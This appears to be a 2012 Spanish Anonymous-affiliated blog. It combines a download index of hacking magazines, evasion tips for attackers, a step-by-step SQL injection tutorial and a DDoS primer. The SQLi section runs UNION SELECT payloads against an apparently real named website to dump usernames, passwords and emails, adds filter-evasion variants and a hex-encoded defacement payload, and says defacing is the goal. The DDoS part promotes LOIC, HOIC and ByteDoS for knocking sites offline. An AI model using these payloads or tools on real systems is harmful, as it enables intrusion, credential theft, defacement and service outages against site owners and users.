18 oct 2012

Colección completa de las revistas Hack X Crack


A continuación encontraran los bien conocidos 30 cuadernos de Hack x Crack, estas son algunas notas y consideraciones que debes tener en cuenta lo siguiente:

Los cuadernos fueron escritos ya hace algún tiempo( Especialmente los primeros ), así que es posibles que ciertos artículos estén el día de doy desfasados,o necesitan ciertas modificaciones. Esto Obviamente es debido a que la tecnología avanza a paso gigante. Leer estos artículos pueden ser de alguna forma muy constructivos



CUADERNOS ANTIGUOS
Cuaderno 1


-Crea tu primer troyano indetectable por los antivirus
-FXP:sin limite de velocidad, utilizando conexiones ajenas
-Los secretos del FTP
-Esquivando firewalls
-Pass mode versus port mode

Descarga: Cuadernos HackxCrack Numero 1

——————————————————————————————————————-

Cuaderno 2


-Code/decode bug (como hackear servidores paso a paso)
-Ocultacion de ip: primeros pasos
-Aznar al frente de la gestapo digital

Descarga: Cuadernos HackxCrack Numero 2

——————————————————————————————————————-

Cuaderno 3


-Ocultando nuestra ip, encadenando proxys
-proxy: ocultando todos nuestros programas tras las cadenas de proxies
-practicas de todo lo aprendido

Descarga: Cuadernos HackxCrack Numero 3

——————————————————————————————————————-
Cuaderno 4


-Crea tu segundo troyano indetectable e inmune a los antivirus
-Radmin: remote administrator 2.1, un controlador remoto a medida

Descarga: Cuadernos HackxCrack Numero 4

——————————————————————————————————————-

Cuaderno 5


-Aprende a compilar, paso obligado antes de explicarte los exploits
-Rootkits, sin defensa posible
-penetracion de sistemas por netbios
-compilacion del netcat con opciones “especiales”
-netbios: un agujero de seguridad no reconocido por microsoft
-La censurado en internet

Descarga: Cuadernos HackxCrack Numero 5

——————————————————————————————————————-

Cuaderno 6


-Curso de visual basic: aprende a programar desde 0
-Ficheros Stream (invisibles, peligrosos y ejecutables)
-Rippeando videos Divx, El rey
-Ocultacion avanzada de ficheros en windows xp
-Listado de puertos y Servicios: imprescindible!!!
-IPHXC: El tercer troyano de hack x crack (parte 1)
-Trasteando con el hardware de una lan

Descarga: Cuadernos HackxCrack Numero 6

——————————————————————————————————————-

Cuaderno 7


-Apache, El mejor servidor web- transforma tu pc en un servidor web
-El cuarto troyano de Hack x Crack: El CCPROXY, un servidor oculto para anonimizar nuestras conexiones
-IPHXC (segunda parte) nuestro tercer troyano
-La inseguridad del protocolo POP3: Capturando las claves de nuestra cuenta de correo
Los primeros pasos con IRIS (sniffando la red)
-Accede por Telnet a servidores POP3, entendiendo los protocolos
-Curso de visual basic, segunda entrega
-Rippeando (2ª parte) el audio: AC3 — MP3 –OGG
-Consigue una cuenta POP3 gratis

Descarga: Cuadernos HackxCrack Numero 7

——————————————————————————————————————-

Cuaderno 8


-Linux: Netcat Perl “pipes”
-Reverse shell, burlando al firewall
-Encadenando programas
-Penetracion inversa en PCs remotos
-SMTP: descubre los protocolos de internet
-Apache: Configuracion, comparte ficheros desde tu propio servidor web
-Jugando de nuevo con el NETCAT
-SERIE RAW: protocolos
-Visual Basic: “Arrray de controles” “vectores” “ocx”

Descarga: Cuadernos HackxCrack Numero 8

——————————————————————————————————————-

Cuaderno 9


-NMAP: El mejor escaneador de internet: instacion, interfaz grafica, opciones de uso
-Iniciacion al PORT SCANNING – Tecnicas de “scaneo”
-Serie RAW: IRC – Internet Relay Chat
-Chateando mediante Telnet
-GNU Linux- Permisos de archivo CAT y otros comandos
-APACHE- Modulos y servidores virtuales
-Descubre los protocolos de “la red” con nosotros
-VISUAL BASIC – Creando librerias. Acceso a datos

Descarga: Cuadernos HackxCrack Numero 9

——————————————————————————————————————-

Cuaderno 10


-GNU LINUX- Gestion de usuarios, editores de texto: “VI”
-Serie Raw: Conociendo protocolos y su seguridad
-Curso de Visual Basic (V) acceso a datos II,
-XML: el futuro de la transferencia de datos
-Apache parte IV, trio de ases: APACHE- PHP- MYSQL

Descarga: Cuadernos HackxCrack Numero 10

——————————————————————————————————————-

Cuaderno 11


-Programacion en GNU Linux: Bash Scripting y C
-Serie Raw: entendiendo los protocolos y su seguridad; Raw 5: FTP (File transfer protocol)
-Intrusión en redes de área local, la pesadilla de todo administrador
-Apache parte V: Configura tu servidor apache como servidor proxy
-Validacion de documentos XML: DTD primera parte: creacion de DTDS
-Curso de Visual Basic (VII) IIS Bug exploit: usando el webbrowser
-Augusta Ada Byron, Lady Lovelace (1815-1852) el primer programa

Descarga: Cuadernos HackxCrack Numero 11

——————————————————————————————————————-

Cuaderno 12


-Explotando los servidores FTP:atravesando firewalls por ftp: aprende a utilizar los servidores ftp como anonimizadores!!!
-Raw 6: FTP segunda parte
-Servidor Web Apache: Protege tu apache configurandolo de forma segura: restriccion de accesos – autentificacion – analizando a nuestros visitantes – logs codificación – HTPASSWD – Cortafuegos
-Visual Studio.net: crea tu propia herramienta de cracking
-Validacion de documentos XML: DTD segunda parte, atributos y elementos
-IIS bug exploit, nuestro primer scanner
-Programacion en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C

Descarga: Cuadernos HackxCrack Numero 12

——————————————————————————————————————-

Cuaderno 13


-Manipulación de documentos XML: El Dom, 1ª parte: teoria del Dom e intterfaz Domdocument
-Programación en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C
-Curso de Visual Basic: un cliente, una necesidad, tenemos un proyecto (parte I)
-RAW 7: HTTP (Hypertext Transfer Protocol)
-Port Scanning: Escaneando ordenadoros Remotos: tipos de scaneos

Descarga: Cuadernos HackxCrack Numero 13

——————————————————————————————————————-

Cuaderno 14


-Curso de PHP, empezamos a programar, PHP (1)
-Serie RAW (Cool DNS – Domain Name System
-Curso de Visual Basic, un cliente, una necesidad, un proyecto, (parte II)
-Programación en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C (III)
-Manipulacion de documentos XML: El Dom 2ª parte. Interfaz XMLDOMNODE (I)
-Tecnicas de Hijacking

Descarga: Cuadernos HackxCrack Numero 14

——————————————————————————————————————-

Cuaderno 15


-Curso de PHP (II) Aprende a programar tu propio generador de IPs
-Serie XBOX Life, instalando Linux en una Xbox
-RAW 9: MSN (Microsoft Messenger)
-Curso de Visual Basic, Un cliente, una necesidad, un proyecto, (parte III)
-Programación en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C (IV)

Descarga: Cuadernos HackxCrack Numero 15

——————————————————————————————————————-
Cuaderno 16


-Curso PHP: Aprende a manejar ficheros con PHP
-Programación en GNU Linux, programación del sistema: El sistema I.P.C.
-Manipulación de documentos XML: El DOM tercera parte
-Serie XBOX LIFE: EVOLUTION X tu mejor amigo
-RAW 10 – NNTP (Usenet)

Descarga: Cuadernos HackxCrack Numero 16
Cuaderno 17


-Hackeando un servidor Windows en 40 segundos!!!
-Programación en GNU Linux: programación del sistema, el sistema I.P.C (II)
-Curso de TCP/IP, introducción
-Curso de PHP, (4ª entrega) Aprende a manejar cadenas de texto en PHP
-Serie XBOX LIFE (III) Cambiando el disco duro y parcheando juegos

Descarga: Cuadernos HackxCrack Numero 17

——————————————————————————————————————-

Cuaderno 18


-Curso de PHP, manejo de formularios web
-Serie XBOX LIFE (IV) Convirtiendo nuestra xbox en un centro multimedia
-Programación en GNU Linux, memoria compartida
-Curso de TCP/IP (2ª entrega) El protocolo de transporte UDP (protocolo de datagramas de usuario)
-El lenguaje XSL, transformacion del documento XML
-La realidad de los virus informáticos

Descarga: Cuadernos HackxCrack Numero 18

——————————————————————————————————————-
Cuaderno 19


-Programación en Gnu Linux, colas de mensajes
-XBOX LIFE V – Jugando online gratis
-Crackeando las restricciones de seguridad de windows
-Curso de seguridad en redes – IDS
-Curso de PHP – Aprende a manejar sockets con PHP

Descarga: Cuadernos HackxCrack Numero 19

——————————————————————————————————————-

Cuaderno 20


-Curso de PHP: Aprende a manejar sesiones
-Curso de TCP/IP (3ª entrega) TCP, 1ª parte
-XBOX LIFE VI, Menu X
-Curso de seguridad en redes – IDS (II)

Descarga: Cuadernos HackxCrack Numero 20

——————————————————————————————————————-

Cuaderno 21


-Trabajando con bases de datos en PHP
-Curso de TCP/IP: 4ª entrega: TCP 2ª parte
-IDS, Sistema de Detección de Intrusos, tercera entrega, pluggins de salida en SNORT
-XBOX LIFE VII, Creando nuestro Slayer

Descarga: Cuadernos HackxCrack Numero 21

Cuaderno 22


-Asaltando foros: guia paso a paso
-Firewalls: Qué son, cómo funcionan y cómo saltárselos

Descarga: Cuadernos HackxCrack Numero 22

——————————————————————————————————————-

Cuaderno 23


-Cómo explotar fallos Buffer Overflow
-Curso de TCP/IP: ICMP (protocolo de mensajes de control de internet)
-Diseño de cortafuegos (parte II)

Descarga: Cuadernos HackxCrack Numero 23

——————————————————————————————————————-

Cuaderno 24


-Los bugs y los exploits, esos pequeños bichos y diablos
-Curso de TCP/IP: La capa IP primera parte. Las direcciones IP
-Hacking de Linux
-Diseño de cortafuegos de red con iptables (3ª parte del curso de firewalls)

Descarga: Cuadernos HackxCrack Numero 24

——————————————————————————————————————-

Cuaderno 25


-Los bugs y los exploits, esos pequeños bichos y diablos, segunda parte
-Vulnerabilidades Web, atacando la sesión de usuario
-Curso de TCP IP: La capa IP, segunda parte, (los datagramas)

Descarga: Cuadernos HackxCrack Numero 25

——————————————————————————————————————-

Cuaderno 26


-Sombras en internet: sniffando la red – formas de detección – utilidades para la detección -ethereal: descripción. Capturando tráfico. Estableciendo filtros. Capturando información sensible. Telnet vs Secure shell
-Atacando la caché DNS
-Curso de TCP IP: La capa IP 3ª parte: fragmentación de datagramas

Descarga: Cuadernos HackxCrack Numero 26

——————————————————————————————————————-

Cuaderno 27


-Taller de Python “episodio 1?
-Taller de Criptografía – El sistema PGP
-Curso de TCP IP: protección con iptables, en una red corporativa
-Buffer Overflow
-Hackeando el núcleo

Descarga: Cuadernos HackxCrack Numero 27

——————————————————————————————————————-

Cuaderno 28


-Hacking Estragegia, capitulo 1
-Curso de Python, capitulo 2
-Investigación, poniendo a prueba el antivirus
-Explotando Heap/BSS Overflows, capitulo 2
-Programación, curso de C, capitulo 1
-Taller de criptografía, capitulo 2
-La “ley de la mordaza”: informar es DELITO

Descarga: Cuadernos HackxCrack Numero 28

——————————————————————————————————————-

Cuaderno 29


-Hacking estrategia: infiltración en una red wireless protegida
-Capitulo III: Taller de criptografía
-Control de Logs en GNU/LINUX
-Explotación de las Format Strings, capitulo III
-Shatter Attacks
-Curso de C, capitulo II
-FAQ, curiosidades de Gmail/Google

Descarga: Cuadernos HackxCrack Numero 29

——————————————————————————————————————-

Cuaderno 30


-Taller de criptografía, capitulo IV
-Ataques a formularios web
-Los secretos del protocolo SOCKS
-Creamos una Shellcode paso a paso
-Capitulo III: Curso de C: Punteros y Arrays
-Hack mundial

Descarga: Cuadernos HackxCrack Numero 30

——————————————————————————————————————-

                                                NUEVOS CUADERNOS





——————————————————————————————————————-
-Cuaderno 1

 -Java: Base + sql

Descarga: Hack x crack: Java:Base + sql
——————————————————————————————————————-

-Cuaderno 2

-de 0 a Python

Descarga: Hack x Crack De 0 a Python
——————————————————————————————————————-
-Cuaderno 3

-Manual de Batch(1ª Parte)

Descarga: Hack x crack Manual Batch(1ª Parte)
——————————————————————————————————————-
-Cuaderno 4

-Manual de Batch(2ª Parte)

Descarga: Hack x crack Manual Batch(2ª Parte)
——————————————————————————————————————-
-Cuaderno 5

-Bindear Archivos

Descarga: Hack x crack Bindear Archivos
——————————————————————————————————————-
-Cuaderno 6

-Tutorial Samba

Descarga: Hack x crack Tutorial Samba
——————————————————————————————————————-
-Cuaderno 7

-Manipulacion Avanzada de Paquetes TCP/IP Con Scapy- Parte 1

Descarga: Hack x crack PCI/IP
——————————————————————————————————————-
-Cuaderno 8

-Manipulacion Avanzada de Paquetes TCP/IP Con Scapy- Parte 2

Descarga: Hack x crack PCI/IP 2ªparte
——————————————————————————————————————-
-Cuaderno 9

-SQL Injection

Descarga: Hack x crack cuaderno 9
——————————————————————————————————————-
-Cuaderno 10

-Wireless cracking desde 0 con backtrack

Descarga: Hack x Crack cuaderno 10
——————————————————————————————————————-
-Cuaderno 11

- Introducción a los Punteros en C

Descarga:Hack x Crack Cuaderno 11
——————————————————————————————————————-
-Cuaderno 12

-Algoritmos y estructura de datos

Descarga: Hack x crack cuaderno 12

15 oct 2012

Consejos para mejorar la seguridad y mantenerte anonimo



1. Eviten entrar a los grupos de la academia y todos los relacionados con anonymous usando sus cuentas reales

2. No revelen datos, tanto de su ubicacion, como de su zona horaria, no den rasgos fisicos con los que puedan ser identifcados.

3. Eviten agregar tantas personas a sus cuentas de facebook, y si lo hacen revisen los perfiles de las personas que agregaran saber si un perfil es falso se conoce, pocos amigos, pocas publicaciones, etc.

4. Ataquen siempre utilizando un servidor VPN, no importa el indole de la pagina.

5. Intente evitar el acceso frecuente a los canales de IRC, no usen sus nick´s de faces en canales IRC, debido a que hay grupos, policiales o no que extraen sus IP, por si no lo sabían sacar una IP de IRC es fácil!

6. Nunca digan que pertenecen al colectivo

7. Eviten la actualización de Su PC.

8.La mas importante, presten atencion, a partir del 19 de este mes la empresa dedicada a la fabricacion de Software, Microsoft, actualizara sus politicas de seguridad, esto se dio a conocer hace unas semanas en su pagina Oficial, Basicamente se dan el derecho de adueñarse mas de su info "por seguridad" todos los usuarios que aun usen sus servicios para esa fecha aceptaran de forma inmediata esas politicas, los usarios de Aonymous que usen Plataformas como hotmail y Skype deben protegerse mejor es por eso que recomendamos la utilizacion de Cuentas Gmail


---ANONYMOUS ACADEMY---

12 oct 2012

Inyecciones SQL


                    Inyeccion SQL, SQLI

                 
      ---    BY  ANONYAUDET  ---



La Inyección SQL o SQLi es una vulnerabilidad centrada en consultas hacia la base de datos de una página o servidor, esta vulnerabilidad puede estar en todo tipo de bases de datos como por ejemplo MYSQL, PostgreSQL, además de lenguajes de programación de web como ASP, PHP y no se me ocurre nada más .


Una Inyección SQL o SQLi suele suceder cuando se inyecta una variable de consultas desde una identidad hacia la base de datos y asi obtener directamente información del usuario administrador o ver a tu antojo todas las tablas y columnas de la web. La mayoria de las veces estos errores en las SQL son por la ignorancia del lenguaje pero este código puede ser reparado por cualquier persona, es muy facil arreglar estos errores, les mostrare esas formas al final en la conclusión.

3.¿En que lenguaje veremos su uso?

Lo veremos en PHP, ya que es en el lenguaje en que me manejo mas, hasta ahora , Ejemplo de una pagina php:

http://www.crdintern...rimir.php?id=12

4.Como saber si el sitio es vulnerable.

Se puede saber haciendo consultas a la identidad (ej: id, act, opc)

http://www.crdintern...ia.php?idmarca= (NUMERO)
http://www.crdintern...mprimir.php?id= (NUMERO)
http://www.crdintern...ido.php?idcate= (NUMERO)

Algunos de esos podrían tener una vulnerabilidad SQLi para poder saber si tiene una vulnerabilidad habrá que hacer una consulta:


http://www.crdintern...rimir.php?id=-1
http://www.crdinternational.com.pe/imprimir.php?id='2


Las paginas normalmente tienen un tipo de “Diccionario” por asi decir, en este diccionario estan las letras usadas para el php, la mayoría de las veces son numeros positivos o letras, si nosotros “insertamos” un numero que no este en este diccionario, podremos obtener errores o deformaciones en la pagina, como por ejemplo:

-Numeros Negativos (-1,-2,-3,-4,-5)
-Signo ' ('1,'2,'3,'4,'5)

Escencialmente se usa la consulta con el signo “ ' “ para saber si tiene el Magic_quotes activado, si lo esta, podremos apreciar errores

Ejemplo de error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2' at line 1

Esto nos podra garantizar poder usar el Magic_quotes y asi obtener sus “beneficios”.

Si probaste las dos de las muchas consultas que existe, y viste que la página web es vulnerable
(te entrega la pagina en blanco, errores como el ejemplo de arriba, deformaciones en la pagina)
es porque quizas sea vulnerable, ya hecho estoy mostrare las inyecciones de arriba y su respuesta:

http://www.crdintern...rimir.php?id=-1

[img width=800 height=169]http://img37.imagesh...7/3613/sqli.png

http://www.crdinternational.com.pe/imprimir.php?id='2

[img width=800 height=78]http://img580.images.../1787/slqi2.png

5.Que hacer si el sitio web es vulnerable.

Garantizo que si la web es vulnerable usar la consulta “-1”.

Bueno en primer lugar, debemos tener la pagina con la consulta -1:

http://www.crdintern...rimir.php?id=-1

Ahora que esta en blanco, usaremos los signos “+” para unir consultas, el comando que llevaremos acabo es el “union select”, que escrito es asi:

http://www.crdintern...-1+union+select

Este comando une dos consultas [-1(Primera Consulta)+union+select+1(Segunda Consulta)],
ahora que tenemos 1 consulta nos falta hacer la segunda la cual sera 1.

http://www.crdintern...nion+select+1--

Lo que estamos haciendo ahora es obtener el numero de tablas que hay en la pagina y encontrar la vulnerable, despues del 1 debemos seguir con el numero 2,3,4,5 hasta que en la pagina web te muestre alguno de los numeros que se puso en la consulta, pueden ser de 1 a X numeros, pero la mayoria de las webs son desde 1 a 20, asi que depende de ti seguir del 20 o mas , bueno quedaria así:

http://www.crdintern...on+select+1,2--
http://www.crdintern...+select+1,2,3--
http://www.crdintern...elect+1,2,3,4--
http://www.crdintern...ect+1,2,3,4,5--
http://www.crdintern...t+1,2,3,4,5,6--
http://www.crdintern...1,2,3,4,5,6,7--
http://www.crdintern...2,3,4,5,6,7,8--


PD: necesitamos poner el signo “--” despues de la inyección para saltar la sentencia que viene a continuación.

Nosotros necesitamos obtener alguno de los numeros puestos en la consulta, como ya los obtuvimos seguiremos avanzando hasta llegar al final , ahora que tenemos la vulnerabilidad, debemos darnos cuenta cuales son los numeros que aparecen en la pagina: en la que estoy probando son los “4,3 y 2”
estos numeros podemos remplazarlos por inyecciones para obtener información sobre la web, podemos remplazar el 4 por “version()” o por “user()”, o los comandos que existan , pero esto no nos sirve de nada, solo cabe decir que asi nos podemos divertir curosiando la pagina desde afuera, las inyecciones serian:

http://www.crdintern...+1,2,3,version(),5,6,7,8--

http://www.crdintern...ect+1,2,3,user(),5,6,7,8--

o los dos juntos:

http://www.crdintern...elect+1,2,user(),version(),5,6,7,8--

Ya sabiendo que reemplazando un numero vulnerable por una inyeccion bien escrita, esta se ejecuta puedo explicarte como podemos obtener las tablas, que son las “categorias” de una pagina web, que en ella podemos obtener cosas como:

“comentarios,contenidos,distribuidor,encuestas,enlaces,marca,noticias,producto,respuesta,usuarios”

en la cual adentro hay columnas que son la informacion de estas “categorias”, en estas podemos encontrar cosas como:

“password,user,id,admin_user,noticia,answer”

para obtener las tablas usaremos el comando “group_concat”, “from” y “information_schema.tables” el primero es un tipo de “buscador” en el cual busca lo que tu deses y este en la pagina web, el segundo es para poner la dirección de donde se encuentra el archivo a buscar, y el tercero es una dirección en donde se encuentran las tablas, la inyección de estas en conjunto seria:

http://www.crdintern...oncat(identidad a buscar),5,6,7,8+from+information_schema.tables--

donde dice “identidad a buscar”, para buscar las tablas debemos poner “table_name” que especifica que estamos buscando todas las tablas de la pagina web, la inyección seria asi:

http://www.crdintern...ncat(table_name),5,6,7,8+from+information_schema.tables--

y obtendriamos muchos nombre que quiza, ni conoscamos y nos podemos confundir, para esto podemos usar este “group_concat” con algunos codigos hexadecimales para poder hacer mas “bonita” la inyección, el codigo es “replace(group_concat(table_name),0x2C,0x3C62723E)“, inyectado quedaria asi:

http://www.crdintern...ncat(table_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.tables--


Son muchas mas, mostre algunas para que vean la diferencia de esta inyección con la otra, si te diste cuenta o no, las inyecciones SQLi, perimiten codigos Hexadecimales, ASCII, y nose cuales mas ya que solo he probado esos dos , bueno ahora que tenemos las tablas buscamos una interesante “nosotros buscamos “Defacear” la web asi que buscaremos algo como “admin,users,usuarios”
bueno en esta web esta “usuarios”, ahora buscaremos las columnas de Usuarios, asi que aprenderas
nuevas inyecciones , estos son el “where” y “table_name=”, con estos dos comandos podemos obtener las columnas de la tabla que queremos (usuarios), para esto la inyección usada para obtener las tablas era:

http://www.crdintern...ncat(table_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.tables--

pero ahora queremos buscar columnas asi que cambiaremos “tables” por “columns”, quedaria así:

http://www.crdintern...cat(column_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.columns--

Bueno si nos metemos al link, vemos que salen muchos nombres, estos son TODAS las columnas de la web pero nosotros queremos saber unas en especial, que son las de la tabla “Usuarios”, para esto usaremos el comando “where” y “table_name=”, “where” especifica la ruta de una tabla o columna y “table_name=” despues del = se pone el nombre de la tabla en Hexadecimal o si esque esta activado el “magic_quotes”, se pone el nombre entre “ ' “, ejemplo:

http://www.crdintern...cat(column_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.columns+where+table_name=0x(USUARIOS EN HEXADECIMAL)--

(ANTES DE CUALQUIER VALOR HEXADECIMAL SE LE DEBE AGREGAR 0x PARA ESPECIFICAR QUE SE VA A AGREGAR UN VALOR HEXADECIMAL A LA INYECCIÓN)

Esto quedaria así:

http://www.crdintern...cat(column_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.columns+where+table_name=0x7573756172696f73



O si esque esta activado el magic_quotes, podriamos tambien ponerlo así:

http://www.crdintern...cat(column_name),0x2C,0x3C62723E),5,6,7,8+from+information_schema.columns+where+table_name='usuarios'

Pero como no esta activado nos da error, por lo tanto no nos sirve de nada .

Ahora que tenemos las columnas de la tabla “Usuarios”, no usaremos ningun nuevo codigo, solo limpiaremos el anterior por:

http://www.crdintern..._concat(COLUMNA),0x2C,0x3C62723E),5,6,7,8+from+TABLA

Como ven ahí esta una inyección, en Columna, ponemos cosas como:

“id,login,password,nivel,email,nombre,apellidos,idusuario”

Por ejemplo podemos poner “login,password,email”, asi sacamos un usuario su clave y quizas el msn tenga la misma clave, quien sabe !, la inyección seria asi:

http://www.crdintern...,password,email),0x2C,0x3C62723E),5,6,7,8+from+usuarios


En todas las inyecciones se le puede añadir hexadecimal asi que le agregaré un = en hexadecimal para separar el user con la password y el mail, quedaria asi:

http://www.crdintern...word,0x3d,email),0x2C,0x3C62723E),5,6,7,8+from+usuarios



Ya teniendo todo, solo hace falta meterte desde el panel y defacear la web, ahora viene la segunda parte:

Segunda parte

Como ya sabemos las inyecciones SQL, pueden tener distintas encriptaciones, por ejemplo podemos tener algo como:

http://www.crdintern...d6c3e,5,6,7,8--

Se ve algo raro, pero es muy simple, encripte:

######html><body background="http://biocatdefacing.***/bggn3.gif"></body></html>

En Hexadecimal y me da el resultado de:

3c68746d6c3e3c626f6479206261636b67726f756e643d22687474703a2f2f62696f6361746465666163696e672e77656263696e646172696f2e636f6d2f6267676e332e676966223e3c2f626f64793e3c2f68746d6c3e, este codigo hexadecimal luego lo inyecto en algun numero vulnerable de la pagina, el resultado es la deformación de la pagina:


Como ven se ve muy bonito, pero no nos sirve absolutamente de nada un codigo html como ese, lo que nos puede servir en estos codigos podría ser que la inyección se vea mas ordenada como por ejemplo:

http://www.crdintern...9636f3a20,email),0x2C,0x3C62723E),5,6,7,8+from+usuarios--

Aquí puse ######brsUsuario:, ######brsClave: y ######brsPassword:, en Hexadecimal y luego lo añadi a la consulta, cabe decir que en una SQLi pueden haber infinitas consultas, podemos hacer lo del cambio de fondo en el numero vulnerable 3, y luego las columnas de la pagina, quedaria asi:


http://www.crdintern...9636f3a20,email),0x2C,0x3C62723E),5,6,7,8+from+usuarios--

No se aprecian las claves pero se ve que si inyecto, para que se vean se les puede cambiar el color de la letra, tambien se puede hacer y es sencillo, solo se usa el codigo en html y se pasa a hexadecimal y luego se ejecuta, no olvide que todo hexadecimal inyectado en la consulta debe tener antes el 0x sino, no funcionaria la Inyección, bueno ahora que saben que el lenguaje encriptado a hexadecimal funciona, les enseñare otra cosa mas:

Nosotros sabemos que el comando para unir dos consultas es el UNION+SELECT y puesto en accion era -1+union+select+NUMERO, bueno ahora les mostrare mas:

-1+UNION+SELECT+
-1'+UNION+SELECT+ (Magic Quotes Activado)
-1+UNION+ALL+SELECT+
-1'+UNION+ALL+SELECT+
-1/**/UNION/**/SELECT/**/ (Se cambia el + por /**/)
-1'/**/UNION/**/SELECT/**/ (Magic Quotes Activado)
-1/**/UNION/**/ALL/**/SELECT/**/
-1'/**/UNION/**/ALL/**/SELECT/**/ (Magic Quotes Activado)
-1/**/UNION/**/ALL/**/SELECT/**/
1+UNION+SELECT+
1'+UNION+SELECT+ (Magic Quotes Activado)
1+UNION+ALL+SELECT+
1'+UNION+ALL+SELECT+
1/**/UNION/**/SELECT/**/
1'/**/UNION/**/SELECT/**/ (Magic Quotes Activado)
1/**/UNION/**/ALL/**/SELECT/**/
1'/**/UNION/**/ALL/**/SELECT/**/
1/**/UNION/**/ALL/**/SELECT/**/

Puedes probarlos todos, pero el que recomiendo es el -1/**/UNION/**/SELECT/**/, este nunca me ha fallado al igual que el predeterminado, ademas de que existan diferentes tipos de este comando, tambien existen diferentes para el comando +FROM+, algunos de los que se son:

+from+
/**/from/**/
%20from%20
+FROM+
/**/FROM/**/
%20FROM%20

Digo lo mismo a lo anterior, pueden probar todos, y recomiendo el /**/from/**/ (Mayus ON/OFF) y el +from+, esto no releva mucho el comando, bueno ahora que sabemos estas dos cosas haré una inyeccion con esto:

http://www.crdintern...2,3,4,5,6,7,8--

Y sacando las tablas, podria ser asi:

http://www.crdintern...ncat(table_name),5,6,7,8/**/from/**/information_schema.tables--

Al igual que la predeterminada funciona igual, solo que es un poco diferente, bueno ahora al sacar las tablas, quizás alguna vez no les funcione el table_name, pero existe uno que hace lo mismo y es el table_schema, esto va igual a el column_name, existe el mismo, column_schema. Ademas de todo esto, las web como ya sabemos pueden contener codigos hexadecimales, estos se agregan en cualquier consulta pero antes se le debe agregar el 0x para especificar que se usara un codigo hexadecimal. Un ejemplo seria cambiar el fondo de la pagina web, lo cambiare a una imagen mia, el codigo en html seria:

######html><body background="http://biocatdefacing.***/bggn3.gif"> </body></htmls, ahora lo encriptamos a hexadecimal:

3c68746d6c3e3c626f6479206261636b67726f756e643d22687474703a2f2f62696f6361746465666163696e672e77656263696e646172696f2e636f6d2f6267676e332e676966223e

Ahora tenemos el codigo, pero les recuerdo que para que se inyecte correctamente debe tener el 0x antes del codigo hexadecimal, quedaria asi:

0x3c68746d6c3e3c626f6479206261636b67726f756e643d22687474703a2f2f62696f6361746465666163696e672e77656263696e646172696f2e636f6d2f6267676e332e676966223e

Copio este codigo y lo añado a la consulta, quedaria asi:


http://www.crdintern...6223e,5,6,7,8--

Ademas podemos “Ordenar” nuestras Inyecciones, por ejemplo al sacar las columnas de usuarios, y son MUCHOS, podriamos separarlos con hexadecimales, por ejemplo:


Usuario: 5573756172696f3a
Clave: 436c6176653a

Entonces ponemos a la Inyección en la cual sacabamos las columnas de la tabla Usuarios, le añadimos antes de login, 5573756172696f3a y antes de password 436c6176653a, quedaria asi:

http://www.crdintern...76653a,password),0x2C,0x3C62723E),5,6,7,8/**/from/**/usuarios--


para arreglar esto, antes de los codigos hexadecimales puestos en la inyección, le agregamos 0x 3c6273e , que significa ######brs, quedaria asi:

http://www.crdintern...76653a,password),0x2C,0x3C62723E),5,6,7,8/**/from/**/usuarios--




Ahora se ve mejor, ademas de esto podemos poner codigos PHP, HTML, JAVASCRIPT, ETC. Bueno ahora les dire lo ultimo en encriptación en SQLi, los numeros 1,2,3,4,5,6,7,8,9,X, pueden tambien ser expresados por “Null”, por ejemplo en la inyección de arriba quedaria asi:

http://www.crdintern...76653a,password),0x2C,0x3C62723E),null,null,null, null/**/from/**/usuarios--

Ahora diferenciaremos la inyección normal con la “encriptada”

http://www.crdintern...76653a,password),0x2C,0x3C62723E),null,null,null, null/**/from/**/usuarios--

http://www.crdintern...,password,email),5,6,7,8+from+usuarios--

Obvio que la primera esta mucho mas elegante, bueno en la tercera parte explicare lo del mysql.user, nos vemos.






---EL CONOCIMIENTO ES LIBRE---


SOMOS ANONYMOUS


SOMOS LEGION


NO PERDONAMOS


NO OLVADAMOS


ESPERADNOS










---ANONYAYDET---

DDoS

Distributed Denial of Service, en español, Denegacion de Sevicio, es sin duda el ataque mas popular de Anonymous y el mas colectivo tambien debido la cantidad de gente que se necesita para llevarlo a cabo.

Como funciona un ataque DDoS?

Toda pagina web tiene un flujo limitado de visitas, en unas se notan mas que en otras, El DDoS básicamente lo que hace es inundar la pagina de solicitudes de entrada (5000 por segundo), provocando una saturacion de la misma en cuestión de horas (a veces minutos), cuando esto se logre la pagina no aceptara visitas y estará "caiga", es decir, nadie podrá acceder a ella.

El DDoS Utiliza los Protocolos TCP/IP (es el protocolo en el que se basa el Internet, permiten la trasmisión entre computadoras) para lograr su objetivo. Si quieren tener mas información Sobre los protocolos TCP/IP  visten este enlace: http://es.wikipedia.org/wiki/Familia_de_protocolos_de_Internet

Pero como logro acceder tantas veces y tan rápido a una pagina?

con el siguiente esquema lo podrán entender:




Cual es la forma de realizar un ataque DDoS?

Hay varias formas de realizar ataques DDoS la mas común de ellas es a través de la WebHive.

Esto es una WebHive



Básicamente es una pagina web lo que da la ironía de "Una pagina atacando a otra". En realidad es parte del código fuente de un LOIC Subido a la web......

Otra forma de realizarlo es con lo que mencione antes el LOIC

Esto es un LOIC


Es muy fácil de Utilizar, y como dije una webhive es un LOIC subido a la red, solo que en el loic tendrás mas opciones como por ejemplo, atacar a un website con su IP.

Existe también el HOIC



Es muy bueno y aveces mas efectivo que el LOIC


Diferencias entre HOIC y LOIC

Básicamente la diferencia entre el LOIC y HOIC no esta en la potencia, sino en el riego legal, cuando atacamos con LOIC cedemos el control a un tercero (Algo así como una PC zombi), cuando atacamos con HOIC no podemos ceder el control a nadie, es decir, que un ataque por LOIC puede ser "Involuntario" en cambio por HOIC debe hacerse consciente.

Otra herramienta muy poderosa es el ByteDoS V3.2, es muy poderosa, lo único malo es que trae muchos virus, pero es efectiva.



En la sección DESCARGAS podrán encontrar mas información sobre cualquiera de estas Herramientas para realizar un Ataque DDoS, al igual que sus links de descarga.





11 oct 2012

El Anonimato en la red

El Anonimato en la red.-


